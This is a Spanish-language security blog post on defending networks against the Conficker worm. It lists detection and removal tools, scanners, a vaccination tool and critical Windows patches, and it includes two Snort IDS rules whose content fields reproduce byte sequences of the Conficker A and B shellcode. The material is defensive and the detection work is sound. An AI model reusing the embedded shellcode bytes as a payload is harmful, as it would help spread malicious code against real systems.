Muchas e importantes compañías sufrieron las consecuencias, a través de conficker, de no atender la seguridad en su justa medida, mientras que muchas otras, como lo dije en otro blog, ni siquiera sintieron el roce de las instrucciones maliciosas del código de conficker. ¿Por qué?


Quizás una orientación acertada para obtener la respuesta coherente para esta pregunta tan trivial pase de cerca por el SGSI (Sistema de Gestión de Seguridad de la Información). Es decir, si queremos "calidad" en la seguridad, "necesitamos" apoyarnos en un proceso sistemático como el que nos ofrece la ISO 27001.


Pero sin desviarnos demasiado, ni entrar en lo más profundo de la gestión de seguridad, sólo diré que muchos de los problemas que ocasiona conficker, pueden (y pudieron) evitarse simplemente con mantener una adecuada gestión de las actualizaciones de seguridad en plataformas Windows.


La realidad es que conficker, como todo código malicioso, constituye un potencial peligro para cualquier entorno de información, en consecuencia, muchos se encuentran sufriendo enormes dolores de cabeza por "la causa" del gusano. Entonces, ¿cómo atacamos el problema?


No es mi intención hacer una cobertura sobre las acciones, vectores de propagación, etc. de conficker ya que en la red hay mucha información al respecto, como el excelente paper llamado
Containing Conficker que forma parte de la serie Know Your Enemy elaborado por la gente de The Honeynet Project, o el escrito por Cert.at llamado Detecting Conficker in your Network.

Pero sí me gustaría facilitar algunas herramientas con las que podemos hacer frente al gusano, ya que en la mayoría de los casos, no todas las compañías AV ofrecen una eliminación completa de la amenaza, sin embargo, la mayoría posee una herramienta de limpieza gratuita que podemos utilizar.

Del mismo modo, la gente de The Honeynet Project ha publicado unas PoC que consisten en herramientas producto de la investigación que han llevado a cabo en torno a este tema.
  • Downatool2. Los nombres de dominio de las diferentes variantes de conficker pueden ser usados para detectar máquinas infectadas dentro de una red.
  • Dominios de colisión de conficker C. A diferencia de la primera y segunda generación de variantes de conficker (conficker.A y B) que crean 250 dominios por día para descargar sus actualizaciones, se espera que la tercera generación, cuente con más de 50.000 dominios. Esta es una lista de los dominios que se esperan descarguen conficker durante abril.
  • Desinfección de memoria. Identificar conficker se torna complicado debido al nivel de empaquetamiento y cifrado que incorpora, salvo cuando se encuentra en memoria.
  • Detección de archivos y modificaciones del registro. Aparentemente, los nombres de archivos y los nombres de las claves que crean en el registro las variantes B y C de conficker, no son al azar, sino que se encuentran basadas en el nombre de cada host infectado. Por el contrario, la variante A sí toma nombres al azar.
  • Simple Conficker Scanner (SCS). Escaner de red para detectar conficker. Requiere la instalación de la librería "Impacket" de python.
  • IDS. Dependiendo de los patrones utilizados por las diferentes generaciones de conficker, es posible detectar su presencia a través de reglas.
    Conficker A

    alert tcp any any -> $HOME_NET 445 (msg:
    "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10
    80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c
    cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|&<O8|92|\;|d3|WG|02 c3|,|dc c4
    c4 c4 f7 16 96 96|O|08 a2 03 c5 bc ea 95|\;|b3 c0 96 96 95 92
    96|\;|f3|\;|24|i| 95 92|QO|8f f8|O|88 cf bc c7 0f f7|2I|d0|w|c7 95
    e4|O|d6 c7 17 f7 04 05 04 c3 f6 c6 86|D|fe c4 b1|1|ff 01 b0 c2 82 ff b5
    dc b6 1b|O|95 e0 c7 17 cb|s|d0 b6|O|85 d8 c7 07|O|c0|T|c7 07 9a 9d 07
    a4|fN|b2 e2|Dh|0c b1 b6 a8 a9 ab aa c4|]|e7 99 1d ac b0 b0 b4 fe eb
    eb|"; sid: 2000001; rev: 1;)

    Conficker B

    alert tcp any any -> $HOME_NET 445 (msg: "conficker.b shellcode";
    content: "|e8 ff ff ff ff c2|_|8d|O|10 80|1|c4|Af|81|9MSu|f5|8|ae c6 9d
    a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|Ise|c4 c4 c4|,|ed c4 c4 c4
    94|&<O8|92|\;|d3|WG|02 c3|,|dc c4 c4 c4 f7 16 96 96|O|08 a2 03
    c5 bc ea 95|\;|b3 c0 96 96 95 92 96|\;|f3|\;|24 |i|95 92|QO|8f f8|O|88
    cf bc c7 0f f7|2I|d0|w|c7 95 e4|O|d6 c7 17 cb c4 04 cb|{|04 05 04 c3 f6
    c6 86|D|fe c4 b1|1|ff 01 b0 c2 82 ff b5 dc b6 1f|O|95 e0 c7 17 cb|s|d0
    b6|O|85 d8 c7 07|O|c0|T|c7 07 9a 9d 07 a4|fN|b2 e2|Dh|0c b1 b6 a8 a9 ab
    aa c4|]|e7 99 1d ac b0 b0 b4 fe eb eb|"; sid: 2000002; rev: 1;)

  • Nonficker Vaxination Tool. Conficker utiliza mutex para asegurarse que en el equipo infectado se encuentra su más reciente versión. Este método puede ser empleado para prevenir potenciales infecciones simulando un servicio levantado a través de una dll.
Incluso, contamos con una nueva versión de nmap (4.85Beta5) que incorpora las rutinas de detección de conficker, disponible para diferentes plataformas: Windows, OSX, Linux.

Por otro lado, es recomendable, ya que no está de más, realizar breves auditorias con el ánimo de verificar el nivel de
seguridad vulnerabilidad de nuestros entornos. Podemos recurrir, por ejemplo, a herramientas como MBSA de Microsoft o CSI/PSI de secunia.

Por último, no hay que olvidarse de instalar las actualizaciones críticas de seguridad que solucionan las vulnerabilidades explotadas por conficker:
MS08-067, MS08-068 y MS09-001.

# pistus

Ver más